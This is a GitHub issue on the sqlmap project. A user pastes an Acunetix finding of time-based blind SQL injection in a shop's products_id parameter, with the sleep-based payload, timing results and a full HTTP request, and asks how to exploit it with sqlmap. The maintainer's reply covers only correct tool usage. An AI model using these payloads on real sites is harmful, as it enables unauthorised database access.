### ISSUE TITLE
Acunetix - Blind SQL Injection

### ISSUE THREAD

**Issue by rikou2** [sqlmapproject/sqlmap#4684]
haw i can scan this with sqlmap pls help ??

Vulnerability description
This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. 

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /shop.php. 
Discovered by: Scripting (Blind_Sql_Injection.script). 
Attack details
URL encoded GET input products_id was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed: 
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/ => 13.047 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 4.532 s
(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/ => 10 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 1.469 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.547 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.344 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.406 s
(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/ => 8.563 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 1.969 s

Original value: 112

Request
GET /shop.php?do=PayPalHub/AddToCart&products_id=&do=CheckStatus/Attributes&isProductInfo=0&page_token=&products_id=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&products_qty=e&target=cart&_=1621390701076 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.test.com:443/
Cookie: GXsid_dfc9f5776724482e=bcc142d66b89ee40be4e737bd6581dd3; GXsid_dfc9f779724482e=bcc142d66b89ee40be4e737bd6581dd3
Host: www.test.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

**Comment by stamparm** [comment]
You've been warned by sqlmap to not put the SQLi inside the request. Use the original value for `products_id` (e.g. `products_id=1`) and not the `products_id=(select(0)from(select(sleep(0...`. You are basically asking me how to use smth from the third party report inside the sqlmap. That should be your work AFAIK.
